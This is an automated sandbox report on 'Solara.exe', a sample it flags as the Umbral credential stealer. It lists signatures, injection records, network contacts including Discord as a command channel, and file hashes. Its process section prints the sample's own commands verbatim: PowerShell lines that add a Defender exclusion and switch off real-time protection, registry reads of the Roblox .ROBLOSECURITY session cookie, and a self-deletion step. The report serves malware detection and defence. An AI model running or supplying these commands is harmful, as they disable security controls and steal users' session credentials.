Malware Analysis Report

2024-10-10 09:56

Sample ID 240709-mmmgla1gre
Target Solara.exe
SHA256 7103785c72f15bc66849b927bb9b0030c2a8383a8f71cd4308b0b42055d8d467
Tags
umbral execution spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7103785c72f15bc66849b927bb9b0030c2a8383a8f71cd4308b0b42055d8d467

Threat Level: Known bad

The file Solara.exe was found to be: Known bad.

Malicious Activity Summary

umbral execution spyware stealer

Umbral

Detect Umbral payload

Umbral family

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Reads user/profile data of web browsers

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 10:35

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral family

umbral

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 10:35

Reported

2024-07-09 11:05

Platform

win11-20240704-en

Max time kernel

1460s

Max time network

1488s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Solara.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral

stealer umbral

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Solara.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4036 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\Wbem\wmic.exe
PID 4036 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\Wbem\wmic.exe
PID 4036 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\SYSTEM32\attrib.exe
PID 4036 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\SYSTEM32\attrib.exe
PID 4036 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\Wbem\wmic.exe
PID 4036 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\Wbem\wmic.exe
PID 4036 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\Wbem\wmic.exe
PID 4036 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\Wbem\wmic.exe
PID 4036 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\Wbem\wmic.exe
PID 4036 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\Wbem\wmic.exe
PID 4036 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\Wbem\wmic.exe
PID 4036 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\System32\Wbem\wmic.exe
PID 4036 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\SYSTEM32\cmd.exe
PID 4036 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\Solara.exe C:\Windows\SYSTEM32\cmd.exe
PID 4824 wrote to memory of 2520 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 4824 wrote to memory of 2520 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Solara.exe

"C:\Users\Admin\AppData\Local\Temp\Solara.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Solara.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Solara.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.3:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/4036-0-0x00007FF97DDE3000-0x00007FF97DDE5000-memory.dmp

memory/4036-1-0x000001EF42940000-0x000001EF42986000-memory.dmp

memory/4036-2-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp

memory/4644-11-0x000001E6532C0000-0x000001E6532E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p30mhrai.ahx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4644-12-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp

memory/4644-13-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp

memory/4644-14-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp

memory/4644-17-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6903d57eed54e89b68ebb957928d1b99
SHA1 fade011fbf2e4bc044d41e380cf70bd6a9f73212
SHA256 36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52
SHA512 c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

memory/4036-31-0x000001EF5D110000-0x000001EF5D186000-memory.dmp

memory/4036-32-0x000001EF5D190000-0x000001EF5D1E0000-memory.dmp

memory/4036-33-0x000001EF5D090000-0x000001EF5D0AE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6490e5c0581c173062323b1c20cfd9ff
SHA1 1652893659f99b780fd9733243637eb7795f5212
SHA256 a552b6d7bebb1714f01a5f3d8b5493e1b369c93ee68c62256dfddcc7f3f4fe79
SHA512 fdb077b40b4371a74cb70ae74d28a4433399e5c4a69fe9a5652409a62c2435d3197da42808d5cb65e9b7ff35bc2e593ad70fa83581c7fd672d631b25f53d3c65

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7332074ae2b01262736b6fbd9e100dac
SHA1 22f992165065107cc9417fa4117240d84414a13c
SHA256 baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA512 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

memory/4036-67-0x000001EF5D0D0000-0x000001EF5D0DA000-memory.dmp

memory/4036-68-0x000001EF5D1E0000-0x000001EF5D1F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e4ce193b91cf2884816e810206c68d4
SHA1 b060d309be5e2ebfec4d8a45629fe9c832b025c0
SHA256 287481dc48be90f1a7469ec4bca5f3ee5a323ee5d1c599c1cc4212204b06f909
SHA512 5f11b694ecee875b3758e675200af0d42a32c7bec2a4fcb15d823531c7d680b47cd1711d6eb8e1e3ceb48f569b136286777d4ac59edf99c7c7bf51420e072add

memory/4036-85-0x00007FF97DDE0000-0x00007FF97E8A2000-memory.dmp